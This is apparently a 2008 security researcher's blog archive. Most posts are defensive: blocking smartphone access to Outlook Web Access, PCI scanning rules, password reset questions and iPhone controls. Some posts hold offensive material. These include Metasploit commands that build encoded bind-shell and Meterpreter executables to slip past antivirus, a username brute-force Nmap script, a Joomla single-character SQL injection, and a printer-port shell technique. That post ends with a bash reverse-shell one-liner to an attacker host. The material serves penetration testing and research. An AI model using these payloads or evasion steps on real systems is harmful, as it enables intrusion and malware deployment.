First, when I wrote my paper, msfencode wouldn't produce an EXE. In my paper I described three techniques for creating an EXE. Since then, metasploit added the ability to create an EXE, but it still has a few kinks. First, msfencode doesn't actually encode the payload. Today it just changes the base address and adds a 0x0A to the end of the payload. I've reported the bug to the development team today. Given that the guys on that team seem to exhale highly functional code I suspect it will be fixed long before anyone reads my blog. I suggest you wait for their fix, but here is what I found.

msfencode has this line where it sets the encoded payload to the variable "RAW"..

# Encode it up

raw = enc.encode(buf, badchars)

Then when it creates its payload it does this call...

exe = Rex::Text.to_win32pe(buf, "")

But "BUF" is the unencrypted payload. Yep. It does nothing. Every EXE you've encoded since the update on Sept 26th (when the EXE encoding option was introduced) hasn't been encoded. "But the MD5 hash changed", you say? Yep. The to_win32pe method of the TEXT object used by msfpayload and msfencode also changes the base memory load address of the binary randomly. So it changes the EXE by a couple of bytes. While waiting on the real fix from the metasploit team you can use one of the three methods describe in my paper or you can make this change...

exe = Rex::Text.to_win32pe(raw, "")

And guess what... msfencode encodes now! BUT the payloads still don't work. If you encode a payload it doesn't run. So we take a look at our new binary in OLLYDBG and see that when the new exe reaches the XOR function to decrypt the payload it generates a Memory Access Violation. I suspect this was the result of the fact that 3.2 moved the actual payload the the .rdata section of the executable. So I reverted the EXE template to the one that came with the 3.1 version. The template that is used for the payload is located in the /data/template/template.exe If you revert to the TEMPLATE.EXE from 3.1 then everything works great. You can encode your payloads (Remember msfencode requires RAW input, see my paper for details) like this...

./msfpayload windows/shell_bind_tcp R | ./msfencode -t exe -o ~/winbindencoded.exe

Hungry for more? Lets have some real fun and double encode it!

./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o ~/winbinddoubleencode.exe

This encrypts the payload once with the countdown xor engine and then wraps that in a shikata_na_gia encoding. Double encoding. Cool! BUT perhaps not very helpful in avoiding antivirus. Encoding something twice will likely just result in the avoidance of the outer encoding algorithm. Oh well.

Here are some numbers from submitting them to www.virustotal.com:

Bindshell = 3/37

Bindshell + countdown = 6/37

Bindshell + Shikata_na_gia encoding = Detected by 6/37

Bindshell + countdown encoding + Shikata_na_gia encoding = Detected by 6/37

I'll talk about this some more at my SANS CDI talk.

Worst cognitive password?

2008-11-20T16:22:00.002-05:00

Cognitive passwords are those questions your bank and other accounts have you setup so that you can reset your password or verify your identity if you have forgotten your password. I personally am not a big fan of these. If forced to implement a solution based on these I would go with several "In the Wallet" questions. Questions that would require the individual pull something from there wallet to answer the question. Things like:

"What are the last 6 digits of your library card number?"

"What is the last name of the issuer of your fitness club card?"

"What is the last 6 digits on your favorite Shopping club card?"

If you use these types of questions you have to give the user many choices. Not everyone has a shopping club card or a library card, so a broad set of questions works best. The goal of coming up with the questions should be to have answers that can not be easily guessed or looked up on the internet. Here are some examples of horrible questions.

Looked up with some simple information about the user:

"So Sarah Palin, where did you meet your spouse?"

"What is your voting precinct or district?"

Easily brute forced or guessed:

"What is your favorite baseball team?" Guess what 80% of the people in Atlanta say.

"What is your favorite color?" Come on, who isn't madly in love with one of the primary colors?

The last category of question that suck is those tha only a few possible answers that could be right. Today I renewed by subscription to a prominent computer SECURITY magazine that asked me, "How many siblings do you have?" With the exception of a few families we can pretty much rule out anything greater than 4. And all of those families have their own discovery channel show, so we know their answers. The best I can hope for is that my answer wont be brute-forced in the first 5 attempts!

Summary: Avoid cognitive passwords if you can. If you have to use them, be very careful with the questions you choose.

Metasploit updates to msfencode and exe template

2008-10-12T15:07:00.003-04:00

HD Moore and the team at Metasploits are constantly updating the framework. The programs, scripts and approaches I document In my SANS paper on the Effectiveness of Antivirus in Detecting Metasploit Payloads have changed significantly. If you haven't read my paper you may find it interesting. Its here

In the document I showed how an attacker can create standalone executable payloads of any of the available payloads in the framework. I showed how to you can use msfencode to alter the payload to avoid detection by antivirus. One difficulty at the time was that msfencode didn't make an executable. That all changed on 9-26! HDM make the some changes to both the template that is used by msfpayload and msfencode (among other things). It now much easier to avoid antivirus. Now msfencode will create an EXE! It doesn't show up in the options when you do msfencode -h but it works! So the following:

./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t exe

will encode the standalone meterpreter with the default encoder Shikata_ga_nai. It works great!! REMEMBER: msfencode wants machine language code as input (RAW output from msfpayload) If you tell msfpayload to generate an EXE then pipe that to msfencode, msfencode will encode the Win32 PE headers and you end up with binary that will not run. Give msfencode C source code and it will produce encoded C source code. But that source code won't run and better than the unecoded one. msfencode needs RAW input. msfencode will also generate RAW output, so you should be able to chain multiple payload encodes. This works great too!

# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/fnstenv_mov -t raw | ./msfencode -t exe > doubleencoded.exe

[*] x86/fnstenv_mov succeeded, final size 342

[*] x86/shikata_ga_nai succeeded, final size 369

UPDATE: I have been unable to reproduce this result again. Encoding binaries a second time has resulted in corruption. I'm not sure what I did wrong last night. I probably tested my single encoded binary thinking it was my double encoded.

Things have change quite a bit since february. A straight payload with no encoding is detected by 3 antivirus products, Avast, AVG and GData. But none of them detect it as a metasploit payload. Instead they detect a generic "dropper". These are NOT the same antivirus products that detected payloads back in february. Those two products (Kasperski and Webgateway) don't detect anything now. Seems we are relying on dumb luck

Unencoded payload is detected by 3 antivirus products, Avast, AVG and GData

Single encoded (shikata_ga_nia) is detected by 3 antivirus products, Avast, AVG and GData

Double encoded (fnstenv_mov + shikata_ga_nia) is detected by 1 Antivirus product, AVG

Additionally HD changed the template that is used. When msfpayload and msfencode create an executable they rather elegantly do a merge of the payload text with the binary /data/template.exe. HD change the template to make it more difficult for antivirus to detect the payloads. It now stores the payloads in the .rdata section rather than the .data section and employes some techniques to avoid detection.

Lets pretend for a minute that antivirus was able to detect the payloads BEFORE these changes. That task just got a whole lot harder for the antivirus vendors.

Pauldotcom.com did some some similar work on metasploit payloads in September of this year. Check out his stuff here.

Symantec Detects Symantec as virus

2008-09-19T15:56:00.002-04:00

I love incidents caused by false positives in antivirus products. Its frustrating enough that they don't detect legitimate threats, but when they delete legitimate files its just a waste of time and energy.

Today I handled an incident where 10% of an organizations machines detected ESUGRemoteSvc.exe as a Trojan..

2008-09-19 17:13:48;2008-09-19 17:23:42;Real Time Scan;LOGGER_Real_Time;1;Virus found;Trojan Horse;1;"C:/WINDOWS/system32/ESUG/ESUGRemoteSvc.exe";Quarantined;

Fire up the IRT engine. Gather samples, run it in a isolated machine to watch it behavior, submit it to virustotal.com and Normans Sandbox, pull it apart with Immunity Debugger, but the thing looks legit. No machines are scanning the network or making TCP connections to an unusual number of hosts, but it appeared to be spreading. So what is this evil program? ITS SYMANTECS OWN ADMIN TOOL!!! ESUG stands for "Enterprise Support Utilities Group"

A call to Symantec confirmed it was a false positive. Thanks for the friday afternoon excitement.

PCI - The gaping hole in your IDS/IPS

2008-09-02T20:05:00.004-04:00

I’ve come to learn PCI requires business leave their network unmonitored and open to attack!!!   Specifically on page 4 item #13 of this document.
https://www.pcisecuritystandards.org/pdfs/pci_scanning_procedures_v1-1.pdf

It reads:
13. Arrangements must be made to configure the intrusion detection system/intrusion prevention system (IDS/IPS) to accept the originating IP address of the ASV. If this is not possible, the scan should be originated in a location that prevents IDS/IPS interference.

I understand what the intention of this requirement is. If your IPS is blacklisting the scanner IP's then ASVs don't get a full assessment because they are a loud and proud scan rather than a targeted attack.    For example, Lets say I have 1000 host on my network.   If during the assessment of host 1 of 1000 the IPS blocks the source IP of the scanner, then serious threats will remain undetected on hosts 2-1000 and portions of host 1.   An attacker who is not nearly as noisy as a scanner would not be blocked by the IPS and could exploit those undetected vulnerabilities.    This is a very legitimate problem and the PCI standard needs to be sure that IPS’s do not cause that. However, blindly accepting the originating IP of the scanner leaves the hosts vulnerable to various attacks.   Attackers can simply reference various public websites to see what IP addresses they need to use to bypass those detective or preventive controls.   For example:

https://www.mcafeesecure.com/help/scanips.jsp

provides attackers with everything they need to launch UDP based attacks against any site with the “HackerSafe” logo on it.   Those attacks will not be detected by the merchant and will not be blocked even though the IPS could have prevented the attack.   UDP based attacks are now enabled as a result of this requirement. Various TCP based spoofing attacks may also be possible (such as NMAP IDLE scans). Again the merchant is now blind to all of these attacks.   IPS/IDS’s are an important of a comprehensive defense strategy.   I am certainly a proponent of eliminating the vulnerabilities on the server and not relying on IPS’s to block the attacks. However Defense in Depth is a staple of any good security program.

PCI does strongly encourages and in circumstances require the use of a Web Application firewall.   Today the lines between Web App Firewalls and IPS’s is a gray one in many circumstances.   For example, many IPS's such as McAfee IntruShield, TippingPoint and others does not do any IP blocking by default that would produce the undesirable affect I described above. They do however drop specific attack packets that match a signature in the same way that Web App firewalls do.   IPSes will drop Cross Site Scripting, SQL and traditional Web App attacks packets in the exact same way that a web app firewall does.   Further more, some web app firewall may do IP list blacklisting and present the undesired scan scenario described above. For example the product: http://www.port80software.com/products/serverdefender/artificialintelligence/    Lists the following on its feature list:

  - Block IP for subsequent HTTP requests

With so much Web App Firewall functionality in boxes that have “IPS” printed on the Appliance and IP blocking in Web App Firewalls I think the wording on that requirement needs to be addresses.

PCI may say something like "Just exclude the IP of the scanner during the scan and reenable the IPS when the scan isn't running." The problem with that approach is that the required UDP exhaustive port scans make the scan very slow. I have personally seen PCI scans for networks with 2000+ hosts take more than a week to complete. Then add in time to fix any findings and rescan and large organizations end up with SIGNIFICANT windows of exposure. In my discussions with various PCI scanning vendors I am told that the OVERWHELMING VAST MAJORITY of business simply exclude the IPS from their IDS/IPS and go about their business. This is very dangerous indeed leaving them completely blind to attackers.

In summary, I don’t believe that the wording of this requirement accurately reflects the PCI Council’s intention. I think that in practice it creates a significant unmonitored exposure for merchants. I have attempted to contact the PCI counsel and see if they can address the exposure and risk to credit card data they are unintentionally creating with this requirement, but they are not interested in speaking with me. But there is a beacon of hope. As I was about to give up I received an email from David Taylor, founder of www.KnowPCI.com. KnowPCI.com is a great forum to pose PCI questions to knowledgeable PCI professionals and get answers to questions. Check out the site. www.knowpci.com

Owned by a SINGLE CHARACTER

2008-08-16T20:44:00.005-04:00

I recently had the no so pleasurable task of dissecting an 0wn3d host to determine what happened. The attacker did the system owner a favor and tagged the site with a defacement image making detection pretty easy. The image appeared in small title frame on the top of the page. My initial guess was they had a directory traversal vulnerability in the image upload engine and some weak permissions on a folder structure. We took a look at the date/time of the defaced pic and it showed the image had change the previous evening. "find / -mtime 0" showed a few other files that had changed around the same time. One of them was a new PHP file. vi revealed it was a variant of the c99 PHP Shell. So we go to the apache logs and find the attackers IP and try to figure out how he got in. There are two interesting entries:

[14/Aug/2008:22:18:42 189.50.144.24 - - [14/Aug/2008:22:18:42 -0400] "POST /index.php?option=com_user&task=completereset HTTP/1.1" 301 -

[14/Aug/2008:22:18:44 189.50.144.24 - - [14/Aug/2008:22:18:44 -0400] "GET /administrator/ HTTP/1.1" 200 4121

A check for recent vendor patches lead us to this..

http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html

This is a very interesting vulnerability. Its a SQL injection vulnerability in the password reset function. The code that actually resets the password is this..

$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));

Token is supposed to a verification code that is sent to your email address when you request a password reset. BUT if you just say your token is an ampersand then the SQL statement looks like this...

SELECT id FROM jos_users WHERE block = 0 AND activation = ''

Which select the first account in the database (ADMINISTRATOR) for a password reset. The next screen that appears is where your prompted for a new admin password. Sorry Dude, Your website was 0wn3d by a single character.

Once the attacker had admin access, he added his own php code (c99 shell) and had full access to the apache instance (as the apache user). So why only a small image in a small frame when he had access to SO much more? Who knows. Perhaps good fortune. Perhaps they caught it early. The attack certainly did not require much work. Just about anyone could pull it off. Maybe he didn't know what he was doing, but my guess is there were a TON of websites out there that required his attention. The PUBLIC disclosure of the PHP vulnerability was about 48 hours old at the time. 48 hours isn't enough time to move through most change control processes. There were probably many more fish to fry.

If you haven't patched. Go ahead and do it and save yourself some heartache.

SANS POST

Exploit

Controlling iPhones in your enterprise

2008-07-25T10:26:00.004-04:00

iPhone 2.0 is really cool and it will, like all other Microsoft Mobile devices, allow the user to synchronize their email to the device unless you take action to prevent it. Whether you plan to support the iphone or not you will need to take some steps if you want any control of the devices in your enterprise. See these arguments in support of the iPhone. And this organization that suggests not supporting it.

If your not supporting iPhones you have a couple of options. You can block the requestes based on their User-Agent by using isapirewrite as I suggested in an earlier blog. The iPhones USER-AGENT string is Apple-iPhone/501.347 so your new isapi filters begin to look like this..

RewriteEngine on

#Block Blackberry, iphones and other smartphones

RewriteCond %{HTTP:User-Agent} (?:BWC.Worker.*|BWC.Engine.*|MSFT-SPhone.*|PalmOne-TreoAce.*|AvantGO.*|Apple-iPhone.*) [NC]

RewriteRule .? - [F,L]

This is a good approach for handling any devices that use WEBDAV or OWA Screen scraping (such as Entourage and Blackberry) to synchronize to handhelds.

Alternatively, since the iPhone is a Microsoft ActiveSync device you can block it by disabling ActiveSync on your exchange server. I will describe that process in this article.

If you plan to allow the iPhone but want to control who can use it you will need to make some changes. By default anyone with iPhone 2.0 software can point their phone at your webmail server and start storing email. To prevent this from happening you need to set the users msExchOmaAdminWirelessEnable attribute to a value of 7. By default its value is NULL which allows all ActiveSync functions. (Default ALLOW... Thanks Microsoft)

I like a little control over who is storing corporate emails on mobile devices. Like minded corporations will need to run a script nightly that disables active sync for new users that are added to your network. Microsoft has a sample script that will disable active-sync for unconfigured users. The script takes user objects where the msExchOmaAdminWirelessEnable is NULL (unconfigured) and sets them to a value of 7 which disables ActiveSync. Download the sample script here.

Here is an explanation of the msExchOmaAdminWirelessEnable attribute:

1 (bit 0) = 1 to disable Server Activesync, 0 to enable it

2 (bit 1) = 1 to disable OMA, 0 to enable it

4 (bit 2) = 1 to disable Always Up-To-Date (AUTD), 0 to enable it

1 + 2 + 4 = 7 = All ActiveSync Features disabled

When you want to enable a user you will need to set the value to 0 (ZERO). A value of 0 (Zero) enables all ActiveSync Functions. This can be enabled through the Exchange Admin tool on the "EXCHANGE FEATURES" tab.

If you enable it you will want to consider enabling some security controls. The iPhone and Microsoft ActiveSync falls short (by a long shot) of the controls you have with Blackberry enterprise. Most notably in my opinion is the lack of device encryption. But you can enable some features such as requiring passwords on the device, inactivity timeouts, wiping the device after a number of failed login attempts and remote "Wipe" of the device. These policies are set on your exchange server using Microsoft Tools.

You can also try the Apple utility, but it lacks central enforcement and users can simply choose not to use it. It is more of a configuration convenience than a security policy enforcement tool. If you try to use that tool, but do not address the fundamental problem of ActiveSync being enabled by default for everyone, then users can simply point to your web server and ignore your Apple XML based configuration.

Note "Wipe" is in quotes. If you "Wipe" the device using the ActiveSync functions built into exchange it appears to just put the device in recovery mode requiring the reinstallation of the iPhone software. I somewhat doubt that this actually wipes the device. It will be interesting to check that out after I get dd on my 2.0 phone.

I also found it interesting that once the "WIPE" command is sent from Exchange, it continues to send the command until you tell it to stop. This will put iPhone users in a circular loop of Wipe, Reinstall, Restore backup (which contains Exchange settings), and the phone is IMMEDIATELY wiped again if they have PUSH email enabled. The users only choice is to setup the iPhone as a new device and not restore that backup again.

Mentoring another SANS class

2008-07-09T14:20:00.002-04:00

Last year I mentored SANS 504 and had a great time. I really enjoy meeting new security people and learning about the challenges they face. This year I am going to mentor SANS 401 and I am really looking forward to it. The best part is, our Augusta ISSA chapter will be the first to participate in a new SANS program which will offer the course at a considerable discount to ISSA members. I hope we have a great class and good turn out from our ISSA chapter.

http://www.sans.org/mentor/details.php?nid=13298

Security is Risk Management

2008-07-06T23:15:00.003-04:00

I just came across this picture. It is a great reminder to security professionals to set priorities and focus on the high risk items. Don't focus your attention on reducing your screen saver time-outs from 30 minutes to 15 minutes if your using telnet on your financial systems. Remember, calculate your SLE (Single Loss Expectancy) based upon the value of the assets and the vulnerability. Calculate your ALE (Annual Loss Expectancy) based upon the likelihood the threat will manifest itself. Then address the issues that really pose the greatest threat to your organization. Don't focus on the Jackhammer noise and overlook the cigarette in your mouth.

First Stab at NSE Scripting

2008-06-25T19:25:00.005-04:00

Over the weekend I decided to take my first look at the NMAP scripting engine. I’ve read about it, but had not really tried it until now. First, here is how to use the built in scripts. First make sure you have the latest scripts. Similar to NIKTO and other vulnerability scanning systems NMAP has the ability to update its detection scripts. To update your scripts type this;

nmap --script-updatedb

This will download the latest .NSE scripts from the nmap site. The scripts (by default) are located in /usr/local/share/nmap/scripts.

Here is the list of scripts as of today:

You can run ALL of these scripts against a host like this…

Macintosh:scripts mark.baggett$ nmap localhost -n --script all

Starting Nmap 4.65 ( http://nmap.org ) at 2008-06-20 10:44 EDT

Interesting ports on 127.0.0.1:

PORT STATE SERVICE

80/tcp open http

|_ HTML title: Test Page for Apache Installation

Nmap done: 1 IP address (1 host up) scanned in 42.216 seconds

-n : says do not do an DNS query

--script all : tells it to run all the scripts against the host

The scripts themselves tell nmap which ports they are applicable to. So any scripts related to PORT 25 (smtp) will not run on a host unless port 25 is open for that host.

You can also pass a script CATEGORY and nmap will run all of the scripts in that category. Categories include SAFE, DEMO, INTRUSIVE, DISCOVERY, VULERABILTY, VERSION and BACKDOOR

So...

Nmap –sS –P0 –n –script INTRUSIVE, VULNERABILITY localhost

Will run all the scripts that have been classified by the script author as “INTRUSIVE” and run all of the scripts that have been categorized as VULNERABILTY against hosts which have the applicable ports open

You can get more information on a script by looking at its sourcce. For example:

Cat /usr/local/share/nmap/scripts/robots.nse will show you the script that displays disallowed entries from the robots.txt file on web servers.

That’s all good, but I want to try my own scripts. NMAP uses a LUA interpreter to process its scripts. I’d never heard of LUA, but it looks pretty intuitive so I thought I’d give it a go. I figured I’d write a script that would look for Apache servers with the USERDIR directory

enabled, then brute force the usernames off of the system. In writing it I found it was easier to use the LUA interpreter built into my Powerbook (as a result of the NMAP install??) rather than repeatedly running it through NMAP. But since my scripts would use functions defined in nmap I needed to be in the /usr/local/share/nmap/nselib directory when I ran the script. For example …

Macintosh:nselib mark.baggett$ pwd

/usr/local/share/nmap/nselib

Macintosh:nselib mark.baggett$ lua ~/HTTPApacheUsers2.txt

BUT there is one important thing to do when debugging your scripts using the LUA interpreter rather than running the code through nmap. Nmap calls the following section of code when it determines the script needs to be run. This is the MAIN function of your nmap script. But LUA doesn’t have a concept of MAIN. So for testing in LUA you will want to comment out the function header and footer with a double dash (--) and statically set the parameters to your function. For example

This:

action = function(host, port)

-- do stuff here

return output

end

Becomes this:

--action = function(host, port)

host = BLA.Com

port = 90

-- do stuff here

-- return output

--end

So after 3 hours of learning the nuances of LUA, I came up with the script below. Recursive code isn’t the fastest way to do this, but the network I/O will be the real bottle neck. To make it faster I’d need to parallelize the GET request and that would probably take a little more LUA experience. To me it means the NSE is very powerful tool and could prove to be a viable alternative to Nessus in the future.

Here is a sample run. Now I can just give it an NSE extension and add it to my /usr/local/share/nmap/scripts directory!

Macintosh:scripts mark.baggett$ nmap localhost -p 80 -n --script ~/HTTPApacheUsers2.txt

Here is the script. Adjust your CHARSET and MAXLENGTH as desired.

require('shortport')

require('strbuf')

require('listop')

require('http')

id = "HTTPApacheUsers.nse"

author = "Mark Baggett "

description = "Brute force usernames on Apache"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"intrusive", "discovery"}

runlevel = 1.0

portrule = shortport.port_or_service({80,443}, {"http","https"}

--charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.,-_"

charset = "abcdefghijklmnopqrstuvwxyz"

username = ''

maxlength = 3

local function replacechar( instring, pos, newchar)

if pos == 1 then

-- replace first character

instring = newchar .. string.sub(instring,2)

else

-- replace mid or end character

instring = string.sub(instring,1, pos-1) .. newchar .. string.sub(instring,pos+1)

end

return instring

end

local function IncUser(position)

local userchar = string.sub(username, position, position)

if userchar == '' then

--the current character is Null add the first char from charset to the end

username = string.sub(username, 1 ,position) .. string.sub(charset,1,1)

elseif userchar == string.sub(charset,-1) then

--Reset current char and Increment the next char

username = replacechar(username, position, string.sub(charset,1,1))

IncUser(position+1)

else

-- Just increment the current character

curchar = string.find(charset, userchar)

username = replacechar(username, position, string.sub(charset,curchar + 1,curchar+1))

end

return username

end

action = function(host, port)

local output = "No Root User Found"

local answer = http.get( host, port, "/~root")

-- print(answer.body)

if answer.status == 403 then

-- print("Root User Found.")

output = "Root user found. "

while string.len(username) <= maxlength do

IncUser(1)

tryme= "/~" .. username

local answer = http.get( host, port, tryme)

-- print(answer.status)

if answer.status == 403 then

output = output .. " User found " .. username .. "."

-- print(output)

end

return output

end

IRONY?

2008-05-30T20:07:00.005-04:00

Here are some screen captures of the Meterpreter threads running inside the Symantec SEP 11 HIPS process and inside the McAfee TOPS HIPS process. I guess DLL injection into the HIPS process isn't a malicious enough behavior.

Both HIPS seems to do a good job of blocking network based exploits, but its still game over if a client runs malicious code or the attacker knows a valid login and password for the box. MAYBE all is not lost. The verdict is still out on whether or not the HIPS config can be adjusted to block this type of backdoor.

ISSA CTF Event

2008-05-19T08:22:00.004-04:00

Over the weekend the Greater Augusta ISSA (Information Systems Security Association) had a Interactive Capture the flag event. McAfee, ASU and Elliot Davis sponsored the event providing an IPS to monitor the event, facilities and computers for attendees to use. McAfee also hosted a flag protected by McAfee HIPS and Intrushield which no one was able to get. But McAfee still awarded the $100 dollar prize to the individual who did capture 7 of the 9 total flags. Over the 4 hour period I walked attendees through tactics used by our enemies to break into the systems we are paid to protect. The event was well attended and I think it was well received. As promised, I am placing links to some of the tools used during the event on this blog. We may do the event again some time so I am not including the PowerPoint with the "solutions". The presentation material will be provided to individual attendees via email and by request only. If you attended and want a copy of the presentation material email me.

Tools Used

Windows TCPDUMP that doesn't require the installation of Winpcap. HERE

NESSUS Vulnerability Scanner HERE

Enum4Linux.pl - Linux tool that uses Null Sessions to enumerate Windows Users, Groups and Shares HERE

BackTrack Penetration Testing Bootable CD HERE

At the moment backtrack's official website is down. Here is an alternate location to download it.

Update: Blocking Unauthorized Devices from accessing OWA

2008-05-06T21:30:00.007-04:00

With the help of several coworkers we are blocking the troublesome User-Agents. Here is a way to do it:

ISAPI Rewrite is a Mod Rewrite implementation for IIS. There is a lite and a full version available here:

http://www.isapirewrite.com/

So with the configuration below you can block the unauthorized blackberries. I will edit the original post to include the solution. For full details see the April 2008 post on the subject on this blog.

RewriteEngine on
#Block Blackberry and other smartphones
RewriteCond %{HTTP:User-Agent} (?:BWC.Worker.*|BWC.Engine.*|MSFT-SPhone.*|PalmOne-TreoAce.*|AvantGO.*) [NC]
RewriteRule .? - [F,L]

Here is another approach for handling the blackberry devices which blocks it by IP address.

http://www.billwarnke.com/index.php/tech/38-internet/54-blocking-blackberry-bis-from-accessing-exchangeowa-email

Googledork - Spidynamics customers

2008-05-05T09:21:00.003-04:00

Here is a fun googledork. It finds web pages which have been scanned with Spidynamics Webinspect with the default values. Its an interesting customer list. WorldBank, American Idol, RSA Security Conference, Oracle, NSA, etc.

Googledork

http://www.google.com/search?q=value777.com&hl=en&start=10&sa=N

Example:

http://www.americanidol.com/myidol/blogs/view/?un=marniesl&eid=237936&page=3

Shoveling windows shell over printer ports!?

2008-04-28T21:08:00.025-04:00

Intrigued by the recent discussion of shoveling shells with native commands in linux, I wondered how you might do that in windows. However, I've found the lack of a /dev/tcp equivalent device makes IO redirection to the network a bit difficult to overcome. No answer yet, but here is an approach that may work. Good old COMMAND.COM might hold the answer. Lets take a look at the options.

C:\WINDOWS>command.com /?

Starts a new instance of the MS-DOS command interpreter.

COMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]

[drive:]path Specifies the directory containing COMMAND.COM file.

device Specifies the device to use for command input and output.

/E:nnnnn Sets the initial environment size to nnnnn bytes.

/P Makes the new command interpreter permanent (can't exit).

/C string Carries out the command specified by string, and then stops.

/MSG Specifies that all error messages be stored in memory. You

need to specify /P with this switch.

DEVICE to use for INPUT OUTPUT!!! That sounds promising. Lets setup a Bidirectional LPT port pointing to a TCPIP address and BAMM!!! Shoveled a shell. Of course for it to work we will have to be able to completely setup the printer from the command line. That shouldn't be to hard PRNPORT.VBS, PRNMNGR.VBS and NET SHARE should get the printer setup and shared. All of which are part of the standard XP installation.

Here is what PRNMNGR looks like to list the print queues.

C:\WINDOWS\system32>cscript prnmngr.vbs -l

Microsoft (R) Windows

Script Host Version 5.6

Server name

Printer name IPLOC

Share name IPt

Driver name HP LaserJet 4 Plus

Port name IPLOC

Comment Standard TCPIP port pointing to Attackers Netcat Listener

Location

Print processor WinPrint

Data type RAW

Parameters

Attributes 2634

Priority 1

Default priority 0

Status Unknown

Average pages per minute 0

Setup the printer and then capture the LPT port with NET USE

NET USE LPT1 \\127.0.0.1\[SHARENAME]

REVIEW:

So command.com has IO redirection to LPT1. LPT1 is mapped to shared localhost printer. The printer has a GENERIC TEXT driver and uses a Bidirectional RAW Standard TCP Printer Port.

The TCP Port points to the remote NETCAT listener on the port of your choosing. 80 is always good.

You can now move files to the remote netcat listener via the LPT port like this:

COPY [FILENAME] LPT1

or have a netcat like Chat session

COPY CON LPT1

Hit [CONTROL Z] when done typing the text to send. But POTENTIALLY coolest of all is the use of the command.com device.

command.com LPT1 /c dir

will shovel the output through the LPT port to the netcat listener. This is potentially very useful in a penetration test, but its only one way. We really want a bidirectional interactive shell.

So we try "Command.com LPT1", but no such luck. The output spools, the remote input makes it to the host, but it isn't being processed. It may be the spooler or the print processor, but somthing is stomping on the communications. If I configure the printer to not use the spooler I don't get anything. I'll have to look later. Here is a print screen that shows a Netcat Listener on a MAC sending commands to the COMMAND.COM listener on the windows machine. You can see where ethereal captured the text going to the COMMAN.COM Listener! Pretty close!!!

"command.com LPT1 /p dir" is interesting also. You get the results shoveled to the remote listener, then an error message about the vdm redirector is also shoveled.

Next Steps:

For now I plan to bypass the Windows spooler and setup the printer on the linux host. The goal is to setup an SMB->Netcat IO handler on Linux. It will appear to the windows victim as a shared printer. Then the only thing to happen on the windows side is "NET USE LPT1 \\[attacker ip]\[shared netcat listener]" followed by "command.com LPT1". Ill look to native commands in linux first to see if I can find some way to share netcat. It doesn't actually require netcat on the linux side. Really we are just trying to share STDIO. I maybe able to do this with just a SAMBA shared printer and replacing the print handler with NETCAT and/or some MKNOD magic. If I cant find something I'll code something in Ruby using Metasploits prebuilt SMB objects. Of course, using this technique we lose the ability to pick an arbitrary remote port and have to have SMB access to the client. I imagine the entire thing could be implemented as a Metasploit framework payload.

BTW: My favorite linux favor of this is from Ed Skoudis' presentation on netcat without netcat ... /bin/bash -i > /dev/tcp/attackerip/port of choosing 0<&1 2>&1

OWA - A GAPING HOLE IN YOUR FIREWALL

2008-04-22T16:36:00.021-04:00

Blocking Personal Blackberrys storing corporate emails

One of the many reason to have a BES (Blackberry Enterprise Server) to protect your corporate email is so you can wipe any blackberry device in the event that it is lost. These devices often contain sensitive email so password protection, encryption, policy enforcement and remote wipe is well worth the investment in BES. BES installed, problem solved! Right? Check the IIS logs on your Outlook Web Access server. You may find unauthorized Blackberry and other smart phones are synchronizing email using WEBDAV. Using OWA they can store corporate emails and you have no way to wipe the data when the devices lost. This DOES NOT require RPC over HTTP be enabled on your OWA server and its not just blackberrys and smart phones. Desktop clients such as Entourage can also use WEBDAV to sync email to a home computer.

No firewall, No antivirus and all those sensitive email on their home machines. Scared yet? If this is a problem for you, the only REAL fix is to turn off OWA. But, that is a tough pill to swallow. Here is a possible alternative.

Check your IIS logs and you'll see entries like this..

008-04-22 16:48:25 W3SVC1 127.0.0.1 POST /exchange/username/##emailname##/ - 443 username 127.0.0.1 BWC/Worker/1.0 200 0 0

2008-04-21 13:35:22 W3SVC1 127.0.0.1 BMOVE /exchange/firstname.lastname/Inbox/ - 443 firstname.lastname 127.0.0.1 BWC+Engine+/2.0 207 0 0

Here you can see an unauthorized blackberry copying emails to the handhelds through the Outlook Interface. The BWC+Engine is the User-Agent used by the Blackberry email client. You may also have some of these...

2008-04-20 23:06:40 W3SVC1 127.0.0.1 POST /Microsoft-Server-ActiveSync Cmd=Get

ItemEstimate&User=jusername&DeviceId=PLMOx8xxxx0&DeviceType=PalmOneTreoAce&
Log=V4XXX:0AXXXX:0XXXXD0SP:1XXXXXXXH0P 443 username 127.0.0.1 PalmOne-TreoAce/2.01m01 200 0 0

2008-04-20 23:42:13 W3SVC1 127.0.0.1 OPTIONS /Microsoft-Server-ActiveSync User
=username&DeviceId=2F8xxxxxxxxxxx&DeviceType=SmartPhone&
Log=VNAXXX:0XXXXX:0A0XXXXX:0C0XXXXXXXH 443 username 127.0.0.1 MSFT-SPhone/5.2.203 200 0 0

If your goal is to keep personal device from synchronizing over Outlook Web Access you will want to block those also.

So how to you block specific User-Agent strings on IIS? Pretty simple in Apache right? Not so much on IIS. You may think (as I did) that you can use URLSCAN. It has this [DenyHeaders] section which allows you to specify a User-Agent. That doesnt' work. It will allow you to block any web request that has a User-Agent (Yeah.. All of them), but not a specific User-Agent. Thank for nothing Microsoft! So how then? You can use a third party ISAPI filter that implements Apache Mod Rewrite functionality on IIS. You can download ISAPI REWRITE from http://www.isapirewrite.com There is a LITE and a FULL version available for download at the site. The LITE version is free and it will work for many of the OWA implementations. Here is the configuration file to use to block User-Agents for Blackberry, PalmTrio, Microsoft Smart Phones, and Avant Go.

RewriteEngine on
#Block Blackberry and other smartphones
RewriteCond %{HTTP:User-Agent} (?:BWC.Worker.*|BWC.Engine.*|MSFT-SPhone.*|PalmOne-TreoAce.*|AvantGO.*) [NC]
RewriteRule .? - [F,L]

This takes care of all of the Microsoft Smart Phones, Palm Treo's and AvantGo users. In my testing it also breaks the functionality on the Blackberries. However, Blackberries which use BIS still make requests with IE user agents strings which are not blocked. The BIS service uses multiple user agents including IE and the BWC agents. You can block the BIS address ranges from reaching OWA at your firewall. Those ranges are:

206.53.144.0 - 206.53.159.255

216.9.240.0 - 216.9.255.255

67.233.64.0 - 67.223.95.255

I found these on Bill Warnke's blog. Here

